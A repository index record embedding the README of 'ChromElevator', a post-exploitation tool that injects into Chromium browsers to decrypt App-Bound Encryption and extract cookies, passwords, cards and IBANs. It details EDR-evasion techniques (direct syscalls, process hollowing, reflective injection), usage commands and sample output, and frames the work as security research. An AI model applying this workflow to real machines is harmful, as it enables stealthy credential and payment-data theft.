{"id":18886512,"url":"https://github.com/xaitax/chrome-app-bound-encryption-decryption","last_synced_at":"2025-12-25T00:21:22.029Z","repository":{"id":259709412,"uuid":"879235382","full_name":"xaitax/Chrome-App-Bound-Encryption-Decryption","owner":"xaitax","description":"Decrypt App-Bound encrypted keys in Chrome 127+, using the IElevator COM interface bypassing path validation and encryption protections.","archived":false,"fork":false,"pushed_at":"2025-05-06T19:53:41.000Z","size":2518,"stargazers_count":440,"open_issues_count":9,"forks_count":78,"subscribers_count":8,"default_branch":"main","last_synced_at":"2025-05-06T20:39:55.882Z","etag":null,"topics":["app-bound","brave","chrome","chromium","dll-injection","edge","ielevator"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/xaitax.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2024-10-27T11:28:35.000Z","updated_at":"2025-05-06T19:53:46.000Z","dependencies_parsed_at":"2024-12-18T00:01:06.944Z","dependency_job_id":"182c95bd-1e69-4d3a-b635-d784c67b41d0","html_url":"https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","commit_stats":{"total_commits":3,"total_committers":1,"mean_commits":3.0,"dds":0.0,"last_synced_commit":"f67cfc4925929503ca5623ed150604ac8f58a52a"},"previous_names":["xaitax/chrome-app-bound-encryption-decryption"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xaitax%2FChrome-App-Bound-Encryption-Decryption/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/xaitax","download_url":"https://codeload.github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254518384,"owners_count":22084374,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["app-bound","brave","chrome","chromium","dll-injection","edge","ielevator"],"created_at":"2024-11-08T07:28:04.059Z","updated_at":"2025-12-25T00:21:22.018Z","avatar_url":"https://github.com/xaitax.png","language":"C","funding_links":["https://ko-fi.com/M4M61EP5XL"],"categories":[],"sub_categories":[],"readme":"# ChromElevator \u003csup\u003e\u003csub\u003e\u003csup\u003e(`Chrome App-Bound Encryption Decryption`)\n\n## πŸš€ Overview\n\n![Build Status](https://img.shields.io/badge/build-passing-brightgreen)\n![License](https://img.shields.io/badge/license-MIT-blue)\n![Platform](https://img.shields.io/badge/platform-Windows%20x64%20%7C%20ARM64-lightgrey)\n![Languages](https://img.shields.io/badge/code-C%2B%2B%20%7C%20ASM-9cf)\n[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/xaitax/Chrome-App-Bound-Encryption-Decryption)\n\nA post-exploitation tool demonstrating a complete, in-memory bypass of Chromium's **App-Bound Encryption (ABE)**. This project utilizes **Direct Syscall-based Reflective Process Hollowing** to launch a legitimate browser process in a suspended state, stealthily injecting a payload to hijack its identity and security context. This **Living-off-the-Land (LOTL)** technique subverts the browser's own security model. The fileless approach allows the tool to operate entirely from memory, bypassing user-land API hooks to decrypt and exfiltrate sensitive user data (cookies, passwords, payments) from modern Chromium browsers.\n\nIf you find this research valuable, I'd appreciate a coffee: \n[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/M4M61EP5XL)\n\n## πŸ›‘οΈ Core Technical Pillars\n\nThis tool's effectiveness is rooted in a combination of modern, evasion-focused techniques:\n\n- **Direct Syscalls for Evasion:** Bypasses EDR/AV user-land hooks on standard WinAPI functions by invoking kernel functions directly. The engine dynamically resolves syscall numbers at runtime using **Hell's Gate** technique with **hash-based function matching** (no plaintext syscall names in the binary).\n\n- **Direct Syscall-Based Process Hollowing:** A stealthy process creation and injection technique. Instead of injecting into a high-traffic, potentially monitored process, it creates a new, suspended host process. This significantly reduces the chances of detection, as all memory manipulations occur before the process begins normal execution.\n\n- **Fileless In-Memory Payload:** The payload DLL never touches the disk on the target machine. It is stored encrypted within the injector using **ChaCha20** with **compile-time derived keys**, decrypted in-memory, and reflectively loaded, minimizing its forensic footprint and bypassing static file-based scanners.\n\n- **Reflective DLL Injection (RDI):** A stealthy process injection method that circumvents `LoadLibrary`, thereby evading detection mechanisms that monitor module loads. The self-contained C loader resolves all of its own dependencies from memory.\n\n- **Target-Context COM Invocation:** The lynchpin for defeating App-Bound Encryption. By executing code _within_ the trusted browser process, we inherit its identity and security context, allowing us to make legitimate-appearing calls to the ABE COM server and satisfy its path-validation security checks.\n\n## βš™οΈ Features\n\n### Core Functionality\n\n- πŸ”“ Full user-mode decryption of cookies, passwords, payment methods, and IBANs.\n- πŸ“ Discovers and processes all user profiles (Default, Profile 1, etc.).\n- πŸ“ Exports all extracted data into structured JSON files, organized by profile.\n- πŸ” Comprehensive browser fingerprinting with system information.\n\n### Stealth \u0026 Evasion\n\n- πŸ›‘οΈ **Fileless Payload Delivery:** In-memory decryption and injection of an encrypted resource.\n- πŸ›‘οΈ **Direct Syscall Engine:** Bypasses common endpoint defenses by avoiding hooked user-land APIs for all process operations.\n- πŸ›‘οΈ **Hash-Based Syscall Resolution:** No plaintext `Nt*`/`Zw*` function names in binaryβ€”uses compile-time DJB2 hashes.\n- πŸ›‘οΈ **Compile-Time Key Derivation:** Encryption keys derived from build metadata, unique per build.\n- πŸ›‘οΈ **PE Header Destruction:** Post-injection PE headers obliterated with pseudo-random data to evade memory scanners.\n- πŸ›‘οΈ **IPC Mimicry:** Browser-specific named pipe patterns that blend with legitimate browser IPC traffic.\n- 🀫 **Process Hollowing:** Creates a benign, suspended host process for the payload, avoiding injection into potentially monitored processes.\n- πŸ‘» **Reflective DLL Injection:** Stealthily loads the payload without suspicious `LoadLibrary` calls.\n- πŸ”’ **Proactive File-Lock Mitigation:** Automatically terminates browser utility processes that hold locks on target database files.\n- πŸ’Ό **No Admin Privileges Required:** Operates entirely within the user's security context.\n\n### Compatibility \u0026 Usability\n\n- 🌐 Works on **Google Chrome**, **Brave**, \u0026 **Edge**.\n- πŸ’» Natively supports **x64** and **ARM64** architectures.\n- πŸš€ **Standalone Operation:** Automatically creates a new browser process to host the payload, requiring no pre-existing running instances.\n- πŸ“ Customizable output directory for extracted data.\n\n\u003cimg width=\"2142\" height=\"1720\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7780fa3c-730b-493a-b5f7-b202c7a59420\" /\u003e\n\n\n## πŸ“¦ Supported \u0026 Tested Versions\n\n| Browser | Tested Version (x64 \u0026 ARM64) |\n| ------------------ | ---------------------------- |\n| **Google Chrome** | 143.0.7499.170 |\n| **Brave** | 1.85.118 (143.0.7499.169) |\n| **Microsoft Edge** | 144.0.3719.35 |\n\n## πŸ” Feature Support Matrix\n\nThis matrix outlines the extraction capabilities for each supported browser.\n\n| Feature | Google Chrome | Brave | Microsoft Edge |\n|----------------------|------------------------|------------------------|-----------------------------------------|\n| **Cookies** | βœ… ABE | βœ… ABE | βœ… ABE |\n| **Passwords** | βœ… ABE | βœ… ABE | βœ… ABE |\n| **Payment Methods** | βœ… ABE | βœ… ABE | βœ… ABE |\n| **IBANs** | βœ… ABE | βœ… ABE | ❌ Not existing |\n\n**Encryption Method Notes:**\n- **ABE (App-Bound Encryption):** Using AES-256-GCM with browser-specific master keys decrypted via COM interfaces.\n- **DPAPI v10:** Legacy Windows Data Protection API encryption. Microsoft Edge has not yet transitioned passwords to ABE, so older DPAPI-based decryption methods are still required and functional.\n- Cookies \u0026 payments use ABE across all browsers. IBANs are not supported in Microsoft Edge.\n\n## πŸ”¬ Technical Workflow\n\nThe tool's execution is focused on stealth and efficiency, built around a **Direct Syscall-based Reflective Hollowing** process. This approach ensures that few high-level API calls are made and that the payload operates from within a legitimate, newly created browser process.\n\n### **Stage 1: The Injector (`chromelevator.exe`)**\n\n1. **Pre-Flight \u0026 Initialization:** The injector begins by initializing its **direct syscall engine**, dynamically parsing `ntdll.dll` to resolve syscall numbers (SSNs) using hash-based matching and locate kernel transition gadgets (`syscall/ret` or `svc/ret`). It then performs a critical pre-flight check, using `NtGetNextProcess` and other syscalls to find and terminate any browser \"network service\" child processes. This preemptively releases file locks on the target SQLite databases.\n2. **Payload Preparation:** The core payload DLL, which is stored as a **ChaCha20-encrypted resource** with compile-time derived keys, is loaded and decrypted entirely in-memory.\n3. **Process Hollowing:** Instead of targeting an existing process, the injector creates a new instance of the target browser in a **`CREATE_SUSPENDED`** state (`CreateProcessW`). This pristine, suspended process serves as the host for our payload.\n4. **Reflective Injection via Syscalls:** Using the direct syscall engine, the injector performs a series of stealthy actions on the suspended process:\n - It allocates memory using `NtAllocateVirtualMemory` (direct syscall).\n - It writes the decrypted payload DLL into the allocated space with `NtWriteVirtualMemory`.\n - It changes the memory region's permissions to executable using `NtProtectVirtualMemory` (direct syscall).\n - It creates a **named pipe** for communication and writes the pipe's name into the target's memory.\n5. **Execution \u0026 Control:** A new thread is created in the target process using `NtCreateThreadEx`. The thread's start address points directly to the payload's `Bootstrap` export, with the address of the remote pipe name as its argument. The original main thread of the browser remains suspended and is never resumed. The injector then waits for the payload to connect back to the pipe.\n\n### **Stage 2: The Injected Payload (In-Memory)**\n\n1. **Bootstrapping:** The `Bootstrap` reflective loader executes, functioning as a custom in-memory PE loader with enhanced stealth:\n - Allocates new memory for the payload using **direct syscalls** to `NtAllocateVirtualMemory` (bypassing hooked `VirtualAlloc`).\n - Correctly maps the DLL's sections and performs base relocations.\n - Resolves its Import Address Table (IAT) by parsing the PEB and hashing function names.\n - Sets section permissions using **direct syscalls** to `NtProtectVirtualMemory`.\n - **Destroys PE headers** by overwriting DOS/NT headers with pseudo-random data, eliminating MZ signature from memory.\n - Finally, invokes the payload's `DllMain`.\n2. **Connection \u0026 Setup:** The `DllMain` spawns a new thread that immediately connects to the named pipe handle passed by the injector. It reads the configuration, including the output path, sent by the injector. All subsequent logs and status updates are relayed back through this pipe.\n3. **Target-Context COM Hijack:** Now running natively within the browser process, the payload instantiates the browser's internal `IOriginalBaseElevator` or `IEdgeElevatorFinal` COM server. As the call originates from a trusted process path, all of the server's security checks are passed.\n4. **Master Key Decryption:** The payload calls the `DecryptData` method on the COM interface, providing the `app_bound_encrypted_key` it reads from the `Local State` file. The COM server dutifully decrypts the key and returns the plaintext AES-256 master key to the payload.\n5. **Data Exfiltration:** Armed with the AES key, the payload enumerates all user profiles (`Default`, `Profile 1`, etc.). For each profile, it queries the relevant SQLite databases (`Cookies`, `Login Data`, `Web Data`), decrypts the data blobs using AES-256-GCM, and formats the secrets as JSON. The results are written directly to the output directory specified by the injector.\n6. **Shutdown:** After processing all profiles, the payload sends a completion signal to the injector over the pipe and calls `FreeLibraryAndExitThread` to clean up. The injector, upon receiving the signal, terminates the parent host process with `NtTerminateProcess`.\n\n## πŸ”§ Build Instructions\n\nThis project uses a simple, robust build script that handles all compilation and resource embedding automatically.\n\n1. **Clone** this repository.\n\n2. Open a **Developer Command Prompt for VS** (or any MSVC‑enabled shell).\n\n3. Run the build script `make.bat` from the project root.\n\n**Build Options:**\n- `make.bat` - Full build (default)\n- `make.bat clean` - Remove all build artifacts\n- `make.bat build_encryptor_only` - Build only the encryptor (used by CI)\n- `make.bat build_target_only` - Build payload and injector (used by CI)\n\n### Automated Builds with GitHub Actions\n\nThis project uses GitHub Actions to automatically build the injector executable (`chromelevator.exe`) for both **x64** and **ARM64** architectures.\n\nYou can find the latest pre-compiled binaries on the [**Releases page**](https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption/releases). The executables for both architectures are packaged together in a single, convenient .zip file.\n\n**Release Package Contents:**\n\n- `chromelevator_x64.exe`\n- `chromelevator_arm64.exe`\n\n## πŸš€ Usage\n\n```bash\nPS\u003e .\\chromelevator.exe --help\n\n_________ .__ ___________.__ __\n\\_ ___ \\| |_________ ____ _____ \\_ _____/| | _______ _______ _/ |_ ___________\n/ \\ \\/| | \\_ __ \\/ _ \\ / \\ | __)_ | | _/ __ \\ \\/ /\\__ \\\\ __\\/ _ \\_ __ \\\n\\ \\___| Y \\ | \\( \u003c_\u003e ) Y Y \\| \\| |_\\ ___/\\ / / __ \\| | ( \u003c_\u003e ) | \\/\n \\______ /___| /__| \\____/|__|_| /_______ /|____/\\___ \u003e\\_/ (____ /__| \\____/|__|\n \\/ \\/ \\/ \\/ \\/ \\/\n Direct Syscall-Based Reflective Hollowing\n x64 \u0026 ARM64 | v0.17.0 by @xaitax\n\n Usage: chromelevator.exe [options] \u003cchrome|edge|brave|all\u003e\n\n Options:\n -v, --verbose Show detailed output\n -f, --fingerprint Extract browser fingerprint\n -o, --output-path Custom output directory\n```\n\n### Options\n\n- `--output-path \u003cpath\u003e` or `-o \u003cpath\u003e`\n Specifies the base directory for output files.\n Defaults to `.\\output\\` relative to the injector's location.\n Data will be organized into subfolders: `\u003cpath\u003e/\u003cBrowserName\u003e/\u003cProfileName\u003e/`.\n\n- `--verbose` or `-v`\n Enable extensive debugging output from the injector.\n\n- `--fingerprint` or `-f`\n Extract comprehensive browser fingerprinting data including version, extensions, security settings, and system information.\n Results saved to `fingerprint.json` in the browser's output directory.\n\n- `--help` or `-h`\n Show this help message.\n\n### Normal Run\n\n```bash\nPS\u003e .\\chromelevator.exe all\n_________ .__ ___________.__ __\n\\_ ___ \\| |_________ ____ _____ \\_ _____/| | _______ _______ _/ |_ ___________\n/ \\ \\/| | \\_ __ \\/ _ \\ / \\ | __)_ | | _/ __ \\ \\/ /\\__ \\\\ __\\/ _ \\_ __ \\\n\\ \\___| Y \\ | \\( \u003c_\u003e ) Y Y \\| \\| |_\\ ___/\\ / / __ \\| | ( \u003c_\u003e ) | \\/\n \\______ /___| /__| \\____/|__|_| /_______ /|____/\\___ \u003e\\_/ (____ /__| \\____/|__|\n \\/ \\/ \\/ \\/ \\/ \\/\n Direct Syscall-Based Reflective Hollowing\n x64 \u0026 ARM64 | v0.17.0 by @xaitax\n\n β”Œβ”€β”€β”€β”€ Brave ──────────────────────────────────────\n β”‚\n β”‚ Decryption Key\n β”‚ 2522A3C1730EA8EE84BAAD1994DB31E20437D9DCF27628997598BB5B86F73DCD\n β”‚\n β”œβ”€β”€ Default\n β”‚ Cookies 2446/2467\n β”‚ Passwords 46\n β”‚ Cards 1\n β”‚ IBANs 1\n β”‚\n └── 2446 cookies, 46 passwords, 1 cards, 1 IBANs (1 profile)\n C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Brave\n\n β”Œβ”€β”€β”€β”€ Chrome ──────────────────────────────────────\n β”‚\n β”‚ Decryption Key\n β”‚ 3FA14DC988A34C85BDB872159B739634CB7E56F8E34449C1494297B9B629D094\n β”‚\n β”œβ”€β”€ Default\n β”‚ Cookies 378/382\n β”‚ Passwords 1\n β”‚\n β”œβ”€β”€ Profile 1\n β”‚ Cookies 768/773\n β”‚ Passwords 2\n β”‚ Cards 1\n β”‚ IBANs 1\n β”‚\n └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)\n C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Chrome\n\n β”Œβ”€β”€β”€β”€ Edge ──────────────────────────────────────\n β”‚\n β”‚ Decryption Key\n β”‚ B0334FAD7F5805362CB4C44B144A95AB7A68F7346EF99EB3F175F09DB08C8FD9\n β”‚\n β”œβ”€β”€ Default\n β”‚ Cookies 220/222\n β”‚ Passwords 2\n β”‚ Cards 1\n β”‚\n β”œβ”€β”€ Profile 1\n β”‚ Cookies 42\n β”‚\n └── 262 cookies, 2 passwords, 1 cards (2 profiles)\n C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Edge\n```\n\n### Verbose\n\n```bash\nPS\u003e .\\chromelevator.exe -v -f chrome\n\n_________ .__ ___________.__ __\n\\_ ___ \\| |_________ ____ _____ \\_ _____/| | _______ _______ _/ |_ ___________\n/ \\ \\/| | \\_ __ \\/ _ \\ / \\ | __)_ | | _/ __ \\ \\/ /\\__ \\\\ __\\/ _ \\_ __ \\\n\\ \\___| Y \\ | \\( \u003c_\u003e ) Y Y \\| \\| |_\\ ___/\\ / / __ \\| | ( \u003c_\u003e ) | \\/\n \\______ /___| /__| \\____/|__|_| /_______ /|____/\\___ \u003e\\_/ (____ /__| \\____/|__|\n \\/ \\/ \\/ \\/ \\/ \\/\n Direct Syscall-Based Reflective Hollowing\n x64 \u0026 ARM64 | v0.17.0 by @xaitax\n\n β”Œβ”€β”€β”€β”€ Chrome ──────────────────────────────────────\n β”‚ Terminating browser network services...\n β”‚ [+] Network services terminated\n β”‚ Creating suspended process: C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\n β”‚ [+] Process created (PID: 25184)\n β”‚ [+] IPC pipe established: \\\\.\\pipe\\chrome.nacl.20027_76C4\n β”‚ Deriving runtime decryption keys...\n β”‚ [+] Payload decrypted (1044 KB)\n β”‚ [+] Bootstrap entry point resolved (offset: 0x2a690)\n β”‚ Allocating memory in target process via syscall...\n β”‚ [+] Memory allocated at 0x1c2dec60000 (1048 KB)\n β”‚ [+] Payload + parameters written\n β”‚ [+] Memory protection set to PAGE_EXECUTE_READ\n β”‚ Creating remote thread via syscall...\n β”‚ [+] Thread created (entry: 0x1c2dec8a690)\n β”‚ Awaiting payload connection...\n β”‚ [+] Payload connected\n β”‚ Running in Chrome\n β”‚\n β”‚ Decryption Key\n β”‚ 3FA14DC988A34C85BDB872159B739634CB7E56F8E34449C1494297B9B629D094\n β”‚\n β”œβ”€β”€ Default\n β”‚ Size 13 MB\n β”‚ Cookies 378/382\n β”‚ Passwords 1\n β”‚\n β”œβ”€β”€ Profile 1\n β”‚ Size 610 MB\n β”‚ Cookies 768/773\n β”‚ Passwords 2\n β”‚ Cards 1\n β”‚ IBANs 1\n β”‚ Extracting comprehensive fingerprint...\n β”‚ Fingerprint saved to fingerprint.json\n β”‚\n └── 1146 cookies, 3 passwords, 1 cards, 1 IBANs (2 profiles)\n C:\\Users\\ah\\Documents\\GitHub\\Chrome-App-Bound-Encryption-Decryption\\output\\Chrome\n```\n\n## πŸ“‚ Data Extraction\n\nOnce decryption completes, data is saved to the specified output path (defaulting to `.\\output\\` if not specified via `--output-path`). Files are organized as follows:\n\n**Base Path:** `YOUR_CHOSEN_PATH` (e.g., `.\\output\\` or the path you provide)\n**Structure:** \u003cBase Path\u003e/\u003cBrowserName\u003e/\u003cProfileName\u003e/\u003cdata_type\u003e.json\n\nExample paths (assuming default output location):\n\n- πŸͺ **Cookies (Chrome Default profile):** .\\output\\Chrome\\Default\\cookies.json\n- πŸ”‘ **Passwords (Edge Profile 1):** .\\output\\Edge\\Profile 1\\passwords.json\n- πŸ’³ **Payment Methods (Brave Default profile):** .\\output\\Brave\\Default\\payments.json\n- 🏦 **IBANs (Chrome Profile 1):** .\\output\\Chrome\\Profile 1\\iban.json\n\n### πŸͺ Cookie Extraction\n\nEach cookie file is a JSON array of objects:\n\n```json\n[\n {\n \"host\": \"accounts.google.com\",\n \"name\": \"ACCOUNT_CHOOSER\",\n \"value\": \"AFx_qI781-…\"\n },\n {\n \"host\": \"mail.google.com\",\n \"name\": \"OSID\",\n \"value\": \"g.a000uwj5ufIS…\"\n },\n …\n]\n```\n\n### πŸ”‘ Password Extraction\n\nEach password file is a JSON array of objects:\n\n```json\n[\n {\n \"url\": \"https://example.com/login\",\n \"user\": \"user@example.com\",\n \"pass\": \"β€’β€’β€’β€’β€’β€’β€’β€’β€’β€’\"\n },\n …\n]\n```\n\n### πŸ’³ Payment Method Extraction\n\nEach payment file is a JSON array of objects:\n\n```json\n[\n {\n \"name\": \"John Doe\",\n \"month\": 12,\n \"year\": 2030,\n \"number\": \"β€’β€’β€’β€’β€’β€’β€’β€’β€’β€’1234\",\n \"cvc\": \"β€’β€’β€’\"\n },\n …\n]\n```\n\n### 🏦 IBAN Extraction\n\nEach IBAN file is a JSON array of objects:\n\n```json\n[\n {\n \"nickname\": \"UK Test\",\n \"iban\": \"GB33BUKB20201555555555\"\n }\n]\n```\n\n### πŸ” Browser Fingerprinting \n\nWhen using the `--fingerprint` or `-f` flag, a comprehensive metadata report is generated:\n\n```json\n{\n \"browser\": \"Chrome\",\n \"executable_path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"browser_version\": \"143.0.7499.170\",\n \"user_data_path\": \"C:\\\\Users\\\\username\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\",\n \"sync_enabled\": false,\n \"enterprise_managed\": true,\n \"update_channel\": \"stable\",\n \"hardware_acceleration\": false,\n \"metrics_enabled\": false,\n \"autofill_enabled\": true,\n \"password_manager_enabled\": false,\n \"safe_browsing_enabled\": true,\n \"do_not_track\": false,\n \"third_party_cookies_blocked\": false,\n \"translate_enabled\": true,\n \"installed_extensions_count\": 2,\n \"extension_ids\": [\"ghbmnnjooekpmoecnnnilnnbdlolhkhi\", \"nmmhkkegccagdldgiimedpiccmgmieda\"],\n \"profile_count\": 2,\n \"computer_name\": \"DESKTOP-ABC123\",\n \"windows_user\": \"username\",\n \"os_version\": \"10.0.26220\",\n \"architecture\": \"ARM64\",\n \"last_config_update\": 1766578854,\n \"extraction_timestamp\": 1766591611,\n \"extraction_complete\": true\n}\n```\n\nThis data provides intelligence about the browser's configuration, security posture, and system context.\n\n## πŸ“š In-Depth Technical Analysis \u0026 Research\n\nFor a comprehensive understanding of Chrome's App-Bound Encryption, the intricacies of its implementation, the detailed mechanics of this tool's approach, and a broader discussion of related security vectors, please refer to my detailed research paper:\n\n1. ➑️ **[Chrome App-Bound Encryption (ABE) - Technical Deep Dive \u0026 Research Notes](docs/RESEARCH.md)**\n\n This document covers:\n\n - The evolution from DPAPI to ABE.\n - A step-by-step breakdown of the ABE mechanism, including `IElevator` COM interactions and key wrapping.\n - Detailed methodology of the DLL injection strategy used by this tool.\n - Analysis of encrypted data structures and relevant Chromium source code insights.\n - Discussion of alternative decryption vectors and Chrome's evolving defenses.\n\n2. ➑️ **[The Curious Case of the Cantankerous COM: Decrypting Microsoft Edge's App-Bound Encryption](docs/The_Curious_Case_of_the_Cantankerous_COM_Decrypting_Microsoft_Edge_ABE.md)**\n\n This article details the specific challenges and reverse engineering journey undertaken to achieve reliable ABE decryption for Microsoft Edge. It includes:\n\n - An account of the initial issues and misleading error codes (`E_INVALIDARG`, `E_NOINTERFACE`).\n - The process of using COM type library introspection (with Python `comtypes`) to uncover Edge's unique `IElevatorEdge` vtable structure and inheritance.\n - How this insight led to tailored C++ interface stubs for successful interaction with Edge's ABE service.\n - A practical look at debugging tricky COM interoperability issues.\n\n3. ➑️ **[COMrade ABE: Your Field Manual for App-Bound Encryption's COM Underbelly](docs/COMrade_ABE_Field_Manual.md)**\n\n This field manual introduces **COMrade ABE**, a Python-based dynamic analyzer for ABE COM interfaces, and dives into its practical applications:\n\n - Explains the necessity for dynamic COM interface analysis due to browser variations and updates.\n - Details COMrade ABE's methodology: registry scanning for service discovery, Type Library loading and parsing, and heuristic-based ABE method signature matching.\n - Provides a comprehensive guide to interpreting COMrade ABE's output, including CLSIDs, IIDs (standard and C++ style), and the significance of verbose output details like VTable offsets, defining interfaces, and full inheritance chains.\n - Highlights the utility of the auto-generated C++ stubs (`--output-cpp-stub`) for rapid development and research.\n - Discusses how COMrade ABE aids in adapting to ABE changes, analyzing new Chromium browsers, and understanding vendor-specific COM customizations.\n\n## πŸ”— Additional Resources \u0026 Research\n\nThis project builds upon the work and analysis of the wider security community.\n\n- **Official Documentation \u0026 Announcements:**\n\n - [Google Security Blog: Improving the security of Chrome cookies on Windows](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html)\n - [Design Doc: Chrome app-bound encryption Service](https://drive.google.com/file/d/1xMXmA0UJifXoTHjHWtVir2rb94OsxXAI/view)\n\n- **Community Research \u0026 Acknowledgment:**\n - Proof of concept by [snovvcrash](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824)\n\n## πŸ—’οΈ Changelog\n\nAll notable changes to this project are documented in the [**CHANGELOG**](CHANGELOG.md) file. This includes version history, new features, bug fixes, and security improvements.\n\n## πŸ“œ License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## πŸ’‘ Project Philosophy \u0026 Disclaimer\n\n\u003e [!IMPORTANT]\n\u003e This is a hobby project created for educational and security research purposes. It serves as a personal learning experience and a playing field for exploring advanced Windows concepts.\n\u003e\n\u003e **This tool is NOT intended to be a fully-featured infostealer or a guaranteed EDR evasion tool.** While it employs advanced techniques, its primary goal is to demonstrate and dissect the ABE mechanism, not to provide operational stealth for malicious use. Please ensure compliance with all relevant legal and ethical guidelines.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxaitax%2Fchrome-app-bound-encryption-decryption","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fxaitax%2Fchrome-app-bound-encryption-decryption","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxaitax%2Fchrome-app-bound-encryption-decryption/lists"}